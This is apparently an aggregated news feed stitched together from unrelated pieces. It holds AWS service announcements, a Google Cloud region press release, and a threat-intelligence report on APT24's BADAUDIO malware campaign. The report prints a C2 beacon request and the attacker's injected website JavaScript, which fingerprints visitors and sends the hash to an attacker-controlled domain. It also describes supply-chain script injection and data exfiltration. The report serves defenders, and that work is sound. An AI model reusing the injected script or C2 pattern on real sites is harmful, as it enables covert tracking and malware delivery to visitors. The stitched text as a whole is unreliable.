You can enable this feature by creating a new target group with a target control port. Once enabled, the feature works with the help of an AWS-provided agent that you run on your targets to track request concurrency. For deployments that include multiple target groups per ALB, you have the flexibility to configure this capability for each target group individually.
You can enable Target Optimizer through the AWS Management Console, AWS CLI, AWS SDKs, and AWS APIs. ALB Target Optimizer is available in all AWS Commercial Regions, AWS GovCloud (US) Regions, and AWS China Regions. Traffic to target groups with Target Optimizer enabled generates more LCU usage than traffic to regular target groups. For more information, see the pricing page, launch blog, and ALB User Guide.
Written by: Harsh Parashar, Tierra Duncan, Dan Perez
Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People’s Republic of China (PRC)-nexus threat actor. For the past three years, APT24 has been deploying BADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks.
While earlier operations relied on broad strategic web compromises of legitimate websites, APT24 has recently pivoted to more sophisticated vectors targeting organizations in Taiwan. These include the repeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted phishing campaigns.
This report provides a technical analysis of the BADAUDIO malware, details the evolution of APT24’s delivery mechanisms from 2022 to present, and offers actionable intelligence to help defenders detect and mitigate this persistent threat.
As part of our efforts to combat serious threat actors, GTIG uses the results of our research to improve the safety and security of Google’s products and users. Upon discovery, all identified websites, domains, and files are added to the Safe Browsing blocklist in order to protect web users across major browsers. We also conducted a series of victim notifications with technical details to compromised sites, enabling affected organizations to secure their sites and prevent future infections.
Figure 1: BADAUDIO campaign overview
Payload Analysis: BADAUDIO and Cobalt Strike Beacon Integration
The BADAUDIO malware is a custom first-stage downloader written in C++ that downloads, decrypts, and executes an AES-encrypted payload from a hard-coded command and control (C2) server. The malware collects basic system information, encrypts it using a hard-coded AES key, and sends it as a cookie value with the GET request to fetch the payload. The payload, in one case identified as Cobalt Strike Beacon, is decrypted with the same key and executed in memory.
GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1
Host: wispy[.]geneva[.]workers[.]dev
Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache
--------------------------
GET
cfuvid=Iewmfm8VY6Ky-3-E-OVHnYBszObHNjr9MpLbLHDxX056bnRflosOpp2hheQHsjZFY2JmmO8abTekDPKzVjcpnedzNgEq2p3YSccJZkjRW7-mFsd0-VrRYvWxHS95kxTRZ5X4FKIDDeplPFhhb3qiUEkQqqgulNk_U0O7U50APVE
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache
Figure 2: BADAUDIO code sample
The malware is engineered with control flow flattening—a sophisticated obfuscation technique that systematically dismantles a program’s natural, structured logic. This method replaces linear code with a series of disconnected blocks governed by a central “dispatcher” and a state variable, forcing analysts to manually trace each execution path and significantly impeding both automated and manual reverse engineering efforts.
BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking (MITRE ATT&CK T1574.001) for execution via legitimate applications. Recent variants observed indicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and LNK files.
These supplementary files automate the placement of the BADAUDIO DLL and a legitimate executable into user directories, establish persistence through legitimate executable startup entries, and trigger the DLL sideloading. This multi-layered approach to execution and persistence minimizes direct indicators of compromise.
Upon execution, BADAUDIO collects rudimentary host information: hostname, username, and system architecture. This collected data is then hashed and embedded within a cookie parameter in the C2 request header. This technique provides a subtle yet effective method for beaconing and identifying compromised systems, complicating network-based detection.
In one of these cases, the subsequent payload, decrypted using a hard-coded AES key, was confirmed to be Cobalt Strike Beacon. However, it is not confirmed that Cobalt Strike is present in every instance. The Beacon payload contained a relatively unique watermark that was previously observed in a separate APT24 campaign, shared in the Indicators of Compromise section. A Cobalt Strike watermark is a unique value generated from and tied to a given "CobaltStrike.auth" file. This value is embedded as the last 4 bytes of all BEACON stagers and in the embedded configuration for full backdoor BEACON samples.
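Because the watermark occupies the last 4 bytes of a stager, a quick triage script can surface it for comparison against known APT24 values; the byte order assumed below may need to be flipped if the result looks implausible.

import struct
from pathlib import Path

def stager_watermark(path: str) -> int:
    """Interpret the trailing 4 bytes of a suspected BEACON stager as its watermark.

    Little-endian byte order is an assumption; switch to ">I" if the value looks implausible.
    """
    data = Path(path).read_bytes()
    (value,) = struct.unpack("<I", data[-4:])
    return value

if __name__ == "__main__":
    print(stager_watermark("suspected_stager.bin"))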
Campaign Overview: BADAUDIO Delivery Evolves
Over three years, APT24 leveraged various techniques to deliver BADAUDIO, including strategic web compromises, repeated supply-chain compromise of a regional digital marketing firm in Taiwan, and spear phishing.
Figure 4: BADAUDIO campaign overview
Public Strategic Web Compromise Campaign
Beginning in November 2022, we observed over 20 compromised websites spanning a broad array of subjects, from regional industrial concerns to recreational goods. This suggests an opportunistic approach to initial access, with true targeting selectively executed against visitors the attackers identified via fingerprinting. The legitimate websites were weaponized through the injection of a malicious JavaScript payload.
Figure 5: Strategic web compromise attack flow to deliver BADAUDIO malware
This script exhibited an initial layer of targeting, specifically excluding macOS, iOS, Android, and various Microsoft Internet Explorer/Edge browser variants to focus exclusively on Windows systems. This selectivity suggests an adversary immediately narrowing their scope to optimize for a specific, likely high-value, victim profile.
The injected JavaScript performed a critical reconnaissance function by employing the FingerprintJS library to generate a unique browser fingerprint. This fingerprint, transmitted via an HTTP request to an attacker-controlled domain, served as an implicit validation mechanism. Upon successful validation, the victim was presented with a fabricated pop-up dialog, engineered to trick the user into downloading and executing BADAUDIO malware.
$(window).ready(function() {
var userAgent = navigator.userAgent;
var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;
var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;
var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;
var isMac = userAgent.indexOf('Macintosh') > -1;
var isiPhone = userAgent.indexOf('iPhone') > -1;
var isFireFox = userAgent.indexOf('Firefox') > -1;
if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) {
var tag_script = document.createElement("script");
tag_script.type = "text/javascript";
tag_script.src = "https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js";
tag_script.onload = "initFingerprintJS()";
document.body.appendChild(tag_script);
if (typeof(callback) !== "undefined") {
tag_script.onload = function() {
callback();
}
}
function callback() {
var option = {
excludes: {
screenResolution: true,
availableScreenResolution: true,
enumerateDevices: true
}
}
new Fingerprint2.get(option, function(components) {
var values = components.map(function(component) {
return component.value
})
var murmur = Fingerprint2.x64hash128(values.join(''), 31);
console.log(murmur)
var script_tag = document.createElement("script");
script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);
document.body.appendChild(script_tag);
});
}
}
});
Figure 6: Early malicious fingerprinting JS used in strategic web compromise campaigns
Figure 7: Example of attacker fake update pop-up dialog impersonating Chrome to lure targets to download and execute BADAUDIO malware
The attackers consistently shift their infrastructure, using a mix of newly registered domains and domains they have previously compromised. We last observed this tactic in early September 2025.
Escalation: Supply Chain Compromise for Strategic Web Compromises at Scale
In July 2024, APT24 compromised a regional digital marketing firm in Taiwan, a supply chain attack that impacted more than 1,000 domains. Notably, the firm experienced multiple re-compromises over the last year, demonstrating APT24’s persistent commitment to the operation.
We initiated a multifaceted remediation effort to disrupt these threats. In addition to developing custom logic to identify and block the modified, malicious JavaScript, GTIG distributed victim notifications to the individual compromised websites and the compromised marketing firm. These notifications provided specific details about the threat and the modifications made to the original script, enabling affected organizations to secure their sites and prevent future infections.
In the first iteration of the supply chain compromise, APT24 injected the malicious script into a widely used JavaScript library (MITRE ATT&CK T1195.001) provided by the firm, leveraging a typosquatting domain to impersonate a legitimate Content Delivery Network (CDN). The deobfuscated JavaScript reveals a multi-stage infection chain:
Dynamic Dependency Loading: The script dynamically loads legitimate jQuery and FingerprintJS2 libraries (MITRE ATT&CK T1059.007) from a public CDN if not already present, ensuring consistent execution across diverse web environments.
Multi-Layer JS Concealment: During a re-compromise discovered in July 2025, the adversary took additional steps to hide their malicious code. The highly obfuscated script (MITRE ATT&CK T1059) was deliberately placed within a maliciously modified JSON file served by the vendor, which was then loaded and executed by another compromised JavaScript file. This tactic effectively concealed the final payload in a file type and structure not typically associated with code execution.
Advanced Fingerprinting: FingerprintJS2 is used to generate an x64hash128 browser and environmental fingerprint (MITRE ATT&CK T1082). The x64hash128 is the 128-bit hash value produced by the MurmurHash3 algorithm, which processes a large input string of collected browser characteristics (such as screen resolution, installed fonts, and GPU details) to create a unique, consistent identifier for the user’s device (a small Python reproduction is sketched after this list).
Covert Data Exfiltration and Staging: A POST request, transmitting Base64-encoded reconnaissance data (including host, url, useragent, fingerprint, referrer, time, and a unique identifier), is sent to an attacker’s endpoint (MITRE ATT&CK T1041).
Adaptive Payload Delivery: Successful C2 responses trigger the dynamic loading of a subsequent script from a URL provided in the response’s data field. This cloaked redirect leads to BADAUDIO landing pages, contingent on the attacker’s C2 logic and fingerprint assessment (MITRE ATT&CK T1105).
Tailored Targeting: The compromise in June 2025 initially employed conditional script loading based on a unique web ID (the specific domain name) related to the website using the compromised third-party scripts. This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT&CK T1189) to a single domain. However, for a ten-day period in August, the conditions were temporarily lifted, allowing all 1,000 domains using the scripts to be compromised before the original restriction was reimposed.
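For defenders who want to reproduce the fingerprint identifier described in the Advanced Fingerprinting step above, the following rough Python equivalent of the Fingerprint2.x64hash128 call uses the mmh3 package; the component values are hypothetical, and the hex formatting may not match the JavaScript implementation byte for byte.

import mmh3

# Hypothetical component values of the kind FingerprintJS2 collects
# (user agent, language, platform, GPU string, fonts, and so on).
components = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...",
    "en-US",
    "Win32",
    "ANGLE (NVIDIA GeForce ...)",
]

# Fingerprint2.x64hash128(values.join(''), 31) is MurmurHash3, x64 128-bit, seed 31.
# mmh3.hash128 defaults to the x64 variant with an unsigned result.
fingerprint = mmh3.hash128("".join(components), 31)
print(format(fingerprint, "032x"))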
Complementing their broader web-based attacks, APT24 concurrently conducted highly targeted social engineering campaigns. Lures, such as an email purporting to be from an animal rescue organization, leveraged social engineering to elicit user interaction and drive direct malware downloads from attacker-controlled domains.
Separate campaigns abused legitimate cloud storage platforms including Google Drive and OneDrive to distribute encrypted archives containing BADAUDIO. Google protected users by diverting these messages to spam, disrupting the threat actor’s effort to leverage reputable services in their campaigns.
APT24 included pixel tracking links, confirming email opens and potentially validating target interest for subsequent exploitation. This dual-pronged approach—leveraging widely trusted cloud services and explicit tracking—enhances their ability to conduct effective, personalized campaigns.
Outlook
This nearly three-year campaign is a clear example of the continued evolution of APT24’s operational capabilities and highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques like supply chain compromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor’s capacity for persistent and adaptive espionage.
This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing stealthy tactics to avoid detection. GTIG actively monitors ongoing threats from actors like APT24 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.
We are committed to sharing our findings with the security community to raise awareness and to disrupt this activity. We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry.
Acknowledgements
This analysis would not have been possible without the assistance from FLARE. We would like to specifically thank Ray Leong, Jay Gibble and Jon Daniels for their contributions to the analysis and detections for BADAUDIO.
We are excited to announce plans to bring a new Google Cloud region to Türkiye, as part of Google’s 10-year, $2 billion investment in the country.
The establishment of this world-class digital infrastructure, in collaboration with Turkcell, marks a significant multi-year investment to accelerate digital transformation in Türkiye and cloud innovation across the region.
“The partnership between Google Cloud and Turkcell will further accelerate Türkiye’s digital transformation journey. It reflects the confidence of global technology leaders in the strength, resilience, and innovation capacity of our economy. By integrating advanced data infrastructure and next-generation cloud technologies into our digital ecosystem, this alliance will enhance efficiency and foster innovation across public and private sectors. Furthermore, it supports our long-term vision of strengthening digital sovereignty and positioning Türkiye as a regional hub for technology, connectivity, and sustainable growth.” Cevdet Yılmaz, Vice President of the Republic of Türkiye
“Our partnership with Google Cloud clearly reinforces Turkcell’s leadership in driving Türkiye’s digital transformation. This strategic partnership is more than a technology investment — it is a milestone for Türkiye’s digital future, accelerating our national vision by leveraging Google Cloud’s global technologies and unlocking opportunities for AI innovations. This collaboration gives our customers seamless access to Google Cloud’s cutting-edge capabilities. This new Google Cloud region will enable enterprises to innovate faster and compete globally. As part of this partnership Turkcell plans to invest $1 billion in data centers and cloud technologies.” – Dr. Ali Taha Koç, CEO, Turkcell
When it is open, the Türkiye region will help meet growing customer demand for cloud services and AI-driven innovation in the country and across EMEA, delivering high-performance services that make it easier for organizations to serve their end users faster, securely, and reliably. Local customers and partners will benefit from key controls that enable them to maintain low latency and the highest international security and data protection standards.
“Cloud technologies are a critical enabler of the financial sector’s ongoing digital transformation. With Google Cloud’s new region in Türkiye, Garanti BBVA will be able to strengthen its operational resilience while continuing to innovate by securely deploying artificial intelligence and advanced data analytics. This collaboration reinforces our commitment to delivering reliable, high-performance digital services to our customers, while ensuring that data sovereignty, privacy, and trust remain at the core of everything we do.” —İlker Kuruöz, Garanti BBVA
“As a global airline connecting Türkiye to the world, Turkish Airlines relies on high-performance, resilient technology to deliver an uninterrupted customer journey, 24/7. Google Cloud’s plan to launch a local region in Türkiye, combined with its global network, is a game-changer for our flight operations, passenger systems, and data-intensive applications. Having hyperscale cloud infrastructure closer to home ensures the low latency required to adopt advanced analytics, robust cybersecurity solutions, and future AI capabilities, accelerating our digital strategy and reinforcing our commitment to service excellence.” — Kerem Kızıltunç, Turkish Airlines
“Yapı Kredi is focused on continuous innovation and modernizing our core banking infrastructure to deliver a limitless banking experience to our customers. The planned Google Cloud region in Türkiye provides the robust, scalable, and secure infrastructure of a hyperscale cloud, which is necessary to power our advanced artificial intelligence and cybersecurity initiatives. This local presence will significantly enhance the performance and flexibility needed to support our growth and empower us to build the next generation of secure, digital-first financial products.” — Gökhan Özdinç, Yapı Kredi Bank
With 42 regions and 127 zones currently in operation around the world, Google Cloud’s global network of cloud regions forms the foundation to support customers of all sizes and across industries. From retail and media and entertainment to financial services, healthcare and the public sector, leading organizations come to Google Cloud as their trusted technology partner.
Key features of the Google Cloud region in Türkiye will include:
Advanced capabilities and technologies: The region will deliver leading Google Cloud services across data analytics, cybersecurity and digital business solutions. Google’s cutting-edge AI innovations will strengthen Türkiye’s digital ecosystem and enable enterprises and public sector entities to operate with greater efficiency, speed and security.
Uncompromising data sovereignty and security: The new region in Türkiye will benefit from our robust infrastructure, including data encryption at rest and in transit, granular data access controls, data residency, and sophisticated threat detection systems. We adhere to the highest international security and data protection standards to help ensure the confidentiality, integrity, and sovereignty of your data.
High performance and low latency: The region will serve end users across Türkiye and neighboring countries with fast, low-latency experiences and make it easy to transfer large amounts of data across Google’s global network.
Scalability and flexibility on demand: Google Cloud’s infrastructure is designed to scale easily with any business. Whether you’re a small startup or a large corporation, you can easily adjust your resources to meet your evolving needs.
AWS Step Functions enhances the TestState API to support local unit testing of workflows, allowing you to validate your workflow logic, including advanced patterns like Map and Parallel states, without deploying state machines to your AWS account.
AWS Step Functions is a visual workflow service capable of orchestrating more than 14,000 API actions from over 220 AWS services to build distributed applications and data processing workloads. The TestState API now supports testing of complete workflows, including error handling patterns, in your local development environment. You can now mock AWS service integrations, with optional API contract validation that verifies your mocked responses match the expected responses from actual AWS services, helping ensure your workflows work correctly in production. You can integrate TestState API calls into your preferred testing frameworks, such as Jest and pytest, and into CI/CD pipelines, enabling automated workflow testing as part of your development process. These capabilities help accelerate development by providing instant feedback on workflow definitions, enabling validation of workflow behavior in your local environment, and catching potential issues earlier in the development cycle.
The enhanced TestState API is available through the AWS SDK in all AWS Regions where Step Functions is available. For a complete list of regions and service offerings, see AWS Regions.
To get started, you can access the TestState API through the AWS SDK, AWS CLI, or check out the AWS Step Functions Developer Guide.
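As an illustration, the sketch below calls TestState through the AWS SDK for Python (boto3) to exercise a single Choice state without deploying a state machine. The role ARN, state definition, and input are placeholders rather than values from this announcement, and the newer mocking and contract-validation options are additional parameters on the same call; consult the Developer Guide for their exact names.

```python
# Minimal sketch: exercise one Choice state via the TestState API using boto3.
# The role ARN, state definition, and input below are placeholders.
import json
import boto3

sfn = boto3.client("stepfunctions")

# Amazon States Language definition of the state under test.
choice_state = {
    "Type": "Choice",
    "Choices": [
        {"Variable": "$.amount", "NumericGreaterThan": 100, "Next": "ManualReview"}
    ],
    "Default": "AutoApprove",
}

response = sfn.test_state(
    definition=json.dumps(choice_state),
    roleArn="arn:aws:iam::123456789012:role/StepFunctionsTestRole",  # placeholder
    input=json.dumps({"amount": 250}),
    inspectionLevel="DEBUG",
)

# For this input the state should succeed and route to "ManualReview".
print(response["status"], response.get("nextState"))
```

Because the call returns plain JSON, the same request can sit inside a pytest or Jest test and assert on the returned status and next state as part of a CI/CD pipeline.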
Amazon Aurora DSQL now provides statement-level cost estimates in query plans, giving developers immediate insight into the resources consumed by individual SQL statements. This enhancement surfaces Distributed Processing Unit (DPU) usage estimates directly within the query plan output, helping developers identify workload cost drivers, tune query performance, and better forecast resource usage.
With this launch, Aurora DSQL appends per-category (compute, read, write, and multi-Region write) and total estimated DPU usage at the end of the EXPLAIN ANALYZE VERBOSE plan output. The feature complements CloudWatch metrics by providing fine-grained, real-time visibility into query costs.
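As a rough illustration, the sketch below runs EXPLAIN ANALYZE VERBOSE against an Aurora DSQL cluster using the PostgreSQL-compatible psycopg driver; the endpoint, credentials, and orders table are placeholders, and the exact wording of the DPU summary lines may differ from what the comments suggest.

```python
# Minimal sketch, assuming a PostgreSQL-compatible driver (psycopg) and placeholder
# endpoint, credentials, and table; Aurora DSQL appends estimated DPU usage at the
# end of the EXPLAIN ANALYZE VERBOSE output.
import psycopg

conn = psycopg.connect(
    host="your-cluster.dsql.us-east-1.on.aws",  # placeholder cluster endpoint
    dbname="postgres",
    user="admin",
    password="<IAM auth token>",                # placeholder credential
    sslmode="require",
)

with conn.cursor() as cur:
    cur.execute(
        "EXPLAIN ANALYZE VERBOSE SELECT id, total FROM orders WHERE id = %s",
        (42,),
    )
    for (line,) in cur.fetchall():
        # The final lines include per-category (compute, read, write,
        # multi-Region write) and total estimated DPU usage.
        print(line)

conn.close()
```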
Amazon EC2 High Memory U7i instances with 16TB of memory (u7in-16tb.224xlarge) are now available in the AWS Europe (Ireland) Region, U7i instances with 12TB of memory (u7i-12tb.224xlarge) are now available in the AWS Asia Pacific (Hyderabad) Region, and U7i instances with 8TB of memory (u7i-8tb.112xlarge) are now available in the Asia Pacific (Mumbai) and AWS GovCloud (US-West) Regions. U7i instances are part of the AWS 7th generation of High Memory instances and are powered by custom fourth generation Intel Xeon Scalable Processors (Sapphire Rapids). U7in-16tb instances offer 16TiB of DDR5 memory, U7i-12tb instances offer 12TiB of DDR5 memory, and U7i-8tb instances offer 8TiB of DDR5 memory, enabling customers to scale transaction processing throughput in a fast-growing data environment.
U7i-8tb instances offer 448 vCPUs, support up to 100Gbps of Amazon Elastic Block Store (EBS) bandwidth for faster data loading and backups, deliver up to 100Gbps of network bandwidth, and support ENA Express. U7i-12tb instances offer 896 vCPUs, support up to 100Gbps of EBS bandwidth, deliver up to 100Gbps of network bandwidth, and support ENA Express. U7in-16tb instances offer 896 vCPUs, support up to 100Gbps of EBS bandwidth, deliver up to 200Gbps of network bandwidth, and support ENA Express. U7i instances are ideal for customers running mission-critical in-memory databases like SAP HANA, Oracle, and SQL Server.
Amazon Braket now offers access to IBEX Q1, a trapped-ion quantum processing unit (QPU) from Alpine Quantum Technologies (AQT), a new quantum hardware provider on Amazon Braket. IBEX Q1 is a 12-qubit system with all-to-all connectivity, enabling any qubit to directly interact with any other qubit without requiring intermediate SWAP gates.
With this launch, customers now have on-demand access to AQT’s trapped-ion technology for building and testing quantum programs, and priority access via Hybrid Jobs for running variational quantum algorithms – all with pay-as-you-go pricing. Customers can also reserve dedicated capacity on this QPU for time-sensitive workloads via Braket Direct with hourly pricing and no upfront commitments.
At launch, IBEX Q1 is available Tuesdays and Wednesdays from 09:00 to 16:00 UTC, providing customers in European time zones convenient access during their work hours. IBEX Q1 is accessible from the Europe (Stockholm) Region.
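To illustrate, the sketch below submits a small circuit to the device with the Amazon Braket SDK for Python; the device ARN is a placeholder (look up the actual IBEX Q1 ARN in the Braket console or Devices API), and tasks only execute during the availability windows noted above.

```python
# Minimal sketch using the Amazon Braket SDK; the device ARN is a placeholder,
# not the official IBEX Q1 ARN from this announcement.
from braket.aws import AwsDevice
from braket.circuits import Circuit

# Replace with the actual AQT IBEX Q1 ARN from the Braket console (eu-north-1).
device = AwsDevice("arn:aws:braket:eu-north-1::device/qpu/aqt/ibex-q1")

# A 2-qubit Bell-state circuit; with all-to-all connectivity, two-qubit gates
# between any pair of qubits need no SWAP insertion.
bell = Circuit().h(0).cnot(0, 1)

task = device.run(bell, shots=100)
print(task.result().measurement_counts)
```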
Amazon Quick Sight now supports comprehensive theming capabilities that enable organizations to maintain consistent brand identity across their analytics dashboards. Authors can customize interactive sheet backgrounds with gradient colors and angles, implement sophisticated card styling with configurable borders and opacity, and control typography for visual titles and subtitles at the theme level.
These enhancements address critical enterprise needs, including maintaining corporate visual identity and creating seamless embedded analytics experiences. With theme-level controls, organizations can ensure visual consistency across departments while enabling embedded dashboards to match host application styling. The theming capabilities are particularly valuable for embedded analytics scenarios, where they allow dashboards to appear native within the host application, improving the overall professional appearance and user experience.
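For orientation only, the sketch below creates a theme programmatically with the existing CreateTheme API via boto3; the account ID, colors, and font family are placeholders, and the newly announced gradient background, card styling, and title typography controls are additional fields in the same theme configuration (see the API reference for their exact names).

```python
# Minimal sketch of programmatic theming via the CreateTheme API (boto3).
# Account ID, colors, and font are placeholders; the newly announced gradient,
# card, and title-typography options extend this configuration.
import boto3

qs = boto3.client("quicksight")

qs.create_theme(
    AwsAccountId="123456789012",          # placeholder account ID
    ThemeId="corporate-brand",
    Name="Corporate Brand",
    BaseThemeId="MIDNIGHT",               # one of the built-in starting themes
    Configuration={
        "UIColorPalette": {
            "PrimaryBackground": "#0B1F3A",
            "PrimaryForeground": "#FFFFFF",
            "Accent": "#FF9900",
        },
        "Sheet": {
            "Tile": {"Border": {"Show": True}},
            "TileLayout": {"Gutter": {"Show": True}, "Margin": {"Show": True}},
        },
        "Typography": {"FontFamilies": [{"FontFamily": "Amazon Ember"}]},
    },
)
```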